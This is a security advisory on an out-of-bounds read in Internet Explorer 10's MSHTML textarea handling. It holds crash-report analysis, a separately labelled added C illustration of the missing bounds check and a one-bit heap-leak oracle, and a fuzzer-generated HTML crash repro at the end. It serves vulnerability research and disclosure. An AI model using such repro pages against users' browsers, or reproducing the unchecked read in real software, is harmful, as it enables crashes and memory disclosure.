Microsoft Internet Explorer 10 MSHTML CElement::GetPlainTextInScope Out-Of-Bounds Read



EKU-ID: 6012 CVE: OSVDB-ID:
Author: SkyLined Published: 2016-11-07 Verified: Verified


Throughout November, I plan to release details on vulnerabilities I
found in web-browsers which I've not released before. This is the third
entry in that series.

The below information is also available on my blog at
http://blog.skylined.nl/20161103001.html. There you can find a repro
that triggered this issue in addition to the information below.

Follow me on http://twitter.com/berendjanwever for daily browser bugs.

MSIE 10 MSHTML CElement::GetPlainTextInScope out-of-bounds read
===============================================================

(The fix and CVE number for this bug are not known)

Synopsis
--------
An unknown issue in Microsoft Internet Explorer 10 could cause it to
read data out-of-bounds. This issue was fixed before I was able to
analyze it in detail, hence I did not determine exactly what the root
cause was.

Known affected software
-----------------------
  + Internet Explorer 10

    An attacker would need to get a target user to open a specially
    crafted web-page. No special configuration settings are required in
    order to trigger the issue. No realistic mitigations are known;
    Javascript is not required to trigger the issue.

Description
-----------
My fuzzers were using a predecessor of BugId
(https://github.com/SkyLined/BugId) to generate a report whenever they
found a bug. Unfortunately, this wasn't as sophisticated as BugId is, so
the information contained in these reports is not as helpful. Still, I
saved three reports, for crashes with slightly different stacks. This
could have been caused by three different versions of MSIE 10 (every
month when Microsoft released a new version with patches, the code may
have been optimized differently, which could explain these differences).
It could also have been caused by the fuzzing framework attempting to
reduce the size of the repro by cutting out chunks, which could lead to
slightly different code-paths. Unfortunately, I do not know which.

Either way, looking at the reports that were automatically generated for
this bug (which can be found at the end of this article), one can find
the following interesting information on all three:
1) The stack tells us that there was a call to `CTextArea::Notify`,
   which suggests the one `textarea` element found in the repro is
   important to triggering the issue.
2) The stack also tells us that there was a call to
   `CElement::GetPlainTextInScope`, which is commonly used to extract
   the text inside an element, so the text content in the `textarea`
   element is probably also important to triggering the issue. Since
   there is no closing `</textarea>` tag, this could be all the data in
   the repro after the opening `<textarea ...>` tag, or up to the first
   closing tag (`</div>`), depending on how the HTML parser works.
3) Clicking on stack `Frame 1` in the report shows the report contains
   some disassembly and registers. Unfortunately, the code that
   generated the disassembly had a bug and started at the wrong
   address, so this isn't very useful. However, clicking on `Registers`
   will show that:
   * The crash happened in `MSHTML!memcpy`.
   * The code looked for a unicode linefeed (0x000A) immediately after
     the data pointed to by `edx`.
   The `Registers` section also suggests the following:
   * `ecx` was 0, so maybe all the data was already copied at this
     point?
   * `edx` was apparently used as a pointer to the data being copied.

Online documentation for `memcpy` does not mention this behavior of
looking for a linefeed, so it could be that `MSHTML` has an odd
implementation, or that the symbol is simply wrong. I'm assuming that
the code did copy the text content of a `textarea` element and was
looking for a `CR`, `LF` line terminator. Unfortunately, the data at
`edx` only contained one or the other, causing the code to look for the
`LF` outside of the memory area allocated to store the data.

Exploit
-------
The above suggests that there is limited opportunity for exploiting this
issue: it may be possible to determine if a memory block allocated for a
string of an attacker controlled size is followed by a memory block that
starts with the bytes `0A 00`. To better understand the impact, one
would have to get an older version of MSIE 10 and debug the crash.
Unfortunately, I did not have time to do so.
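To make the suspected bug pattern from the Description and the one-bit
oracle from the Exploit section concrete, here is an added example in C.
It is not MSHTML code and not part of the original advisory or repro; it
is a hypothetical reconstruction of the assumption made above, namely a
scan over UTF-16 text that treats `CR` `LF` as one terminator and peeks
at the code unit after a `CR` without checking that one exists. The
function names, the `wchar16` type and the 4-unit sample string are
invented for the illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* UTF-16 code unit, the representation MSHTML uses for DOM text. */
typedef uint16_t wchar16;

#define CR 0x000Du
#define LF 0x000Au

/* Hypothetical reconstruction of the suspected bug pattern; this is not
 * MSHTML code. Returns the number of code units occupied by the first
 * line of text[0..len), including its terminator, or len if the text
 * has no terminator. A CR LF pair counts as a single two-unit terminator.
 * BUG: when the last code unit is a lone CR, the look-ahead for LF reads
 * text[len], one unit past the end of the buffer. */
static size_t first_line_len_vuln(const wchar16 *text, size_t len) {
    for (size_t i = 0; i < len; i++) {
        if (text[i] == LF)
            return i + 1;
        if (text[i] == CR)
            /* text[i + 1] is out of bounds when i == len - 1 */
            return text[i + 1] == LF ? i + 2 : i + 1;
    }
    return len;
}

/* Same logic with the missing bounds check on the look-ahead. */
static size_t first_line_len_fixed(const wchar16 *text, size_t len) {
    for (size_t i = 0; i < len; i++) {
        if (text[i] == LF)
            return i + 1;
        if (text[i] == CR)
            return (i + 1 < len && text[i + 1] == LF) ? i + 2 : i + 1;
    }
    return len;
}

/* Model of the information leak sketched in the Exploit section. The
 * "string" is the constructed 4-unit prefix "abc\r" of a larger backing
 * array, so the code unit that follows it stands in for the first two
 * bytes of whatever allocation sits after the string on the heap. The
 * vulnerable scan reports 5 units when that neighbor is 0A 00 and 4
 * otherwise, so its result reveals memory the string does not own.
 * (Keeping the neighbor inside one array keeps the read well defined
 * for this demonstration; with a separate allocation, Page Heap or ASan
 * would flag the access instead.) */
static size_t vuln_oracle(wchar16 neighbor) {
    wchar16 backing[8] = { 'a', 'b', 'c', CR, neighbor, 0, 0, 0 };
    return first_line_len_vuln(backing, 4);
}

static size_t fixed_oracle(wchar16 neighbor) {
    wchar16 backing[8] = { 'a', 'b', 'c', CR, neighbor, 0, 0, 0 };
    return first_line_len_fixed(backing, 4);
}

int main(void) {
    printf("vulnerable, neighbor 0A 00: %zu units\n", vuln_oracle(LF));
    printf("vulnerable, neighbor 'x':   %zu units\n", vuln_oracle('x'));
    printf("fixed,      neighbor 0A 00: %zu units\n", fixed_oracle(LF));
    printf("fixed,      neighbor 'x':   %zu units\n", fixed_oracle('x'));
    return 0;
}
```

The difference between the two `vuln_oracle` results is the whole
"exploit": an attacker who controls the string length and can observe
the scan's result (for instance through a line count or a selection
offset) learns one bit about the heap block that follows the string.
Whether MSIE 10 actually exposed such a result is exactly what the
advisory says it could not determine.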

Cheers,

SkyLined



Repro:

?xm?>
<!DO><meta B>@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@em><noframes stSSS>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<ins></ins><input type="file"></input type="file">WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW                                            <details style="nav-left: auto !important; list-style-type: lower-greek; fill-opacity: 0.0089285714285714280757932925780551158823072910308837890625; text-align-last: center; writing-mode: rl-tb; fill-rule: nonzero; text-emphasis-style: open dot; marker-end: none; nav-index: 6; color-rendering: inherit" id="id_3" primary='2506545610.1541335502e+266' onwebkitanimationiteration><label><dt></table></dt></summary></input type="password"></figcaption><isindex></isindex>*****************<h3 style="color-interpolation: auto; border-image-outset: 0.0082644628099173556012857488894951529800891876220703125 !important; hyphenate-character: &quot;Rh{Xz*&lt;2Z-Y0i 9H#T`lV|W&lt;X&gt;&amp;Kb4D/[\\4\\[3{wkC$TYu*[m7KE43~x,=oen3Bix-bjm3\)Axr7o3_HBhUU$?W7@&gt;*3_aP#3t&lt;kjcDD!~ VqX *YP05bS5@|&amp;V:2\&quot;xcIaM \&quot;yW?J1olm!9Q\\?@`1*z^h;Zs8NCtj`&lt;^2Q^[gp@H&#x39;qwIiwLr|^UU:\9oKcfL!9;\(wX0///c&gt;tmp5PGSlYC!EYxAC\(&gt;CRZu&gt;!;J:Pv[x}* zsSGxSvTVm&gt;gg$4o=b5sUF3&quot;; -webkit-mask-position: top; -webkit-animation-duration: +6.5ms; -webkit-margin-top-collapse: collapse; text-shadow: none; font: small-caption; -webkit-max-logical-width: intrinsic; caption-side: inherit" style=0x80000001></tbody></progress></noframes><nobr arluenow></nobr><noscript event><var><u ></noscript><input type="t="text"><video ied><p/>^<fyer>/form><b>22nnn+++</b></atosave><textarea 
id="id_@@@@@@">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj111111111111111777xx}}gg:::::::::::::::::::::::::::::::##^^^^^^^^mmmmmmmmmmmmmmm<legend><div class="class_0" onwaiting=`rgb(220,86,120)` oninvalid>DDhhhhhh</div><frame/><q style="-webkit-transform-origin: left !important; -webkit-box-pack: start; target: inherit; column-rule-width: none; text-decoration-line: line-through; border-width: thin; -webkit-margin-after: 18.80531505%; transition-delay: 23.17ms 3623.285s; -webkit-border-top-right-radius: 0000000000000000000000000000000025699999999% 00000000000000000000000000000000171798691869999999999999999% +000.008264462809917355601285748889495152980089187622070312500em; text-autospace: none" onmousewheel></frame></legend></h4>aVVV&&&&&&<xml/>uuuuuuxxxxx|---<h6/><bgsound></bgsound><datagrid  optimum></xml></form></label><var id="id_4" aria-label=PPP onkeydown='Beige' onstalled=`Olive` maxlength="}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSooooooooo~~~~~~WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW@@xxxxx">.VVVVV\qqq<caption></caption><option id="id_2" datetime/>9999cccppppppp<nolayer aria-readonly/></nolayer><img src="data:image/svg+xml,&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&qua;&lt;!DOCTYPE svg PUBLIC &quot;-//W3C//DTD SVG 1.1//EN&t;http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd&quot;&gt;&#&lt;svg&;  version=&quot;1.1&quot;&#xd;&#xa;  xmlns=&quot;http://www.w3.org/2000/svg&quot;&gt;&#&lt;/svg&gt;&#xd;&#xa;"></option></var></head><body></link><track class="class_5" hreflang 
onwaiting='sssssssssssssssssssssssssssssss&lt;______________)))))))))))))))))SSSSSS'>88888888888vv(GGGGGGGGSSSSSSSSSSSSSSSSSSSSSSSSSS,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllPeeeVVVVVVVVVVVVVVVVVVVVVVV5555555555599999ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc<dfn><hgroup><noframes indeterminate="M" nowrap=&#xd;&#xd;Ldraggable=FireBrick action=YYYYYYYYYYYYYYTTTKKKKKKKKKKKKKKKQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ...>JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ:::::::::::::::::::::::::::::???????????????????????????????????OOOOOOOOOOOOOOOOOOOOOOOO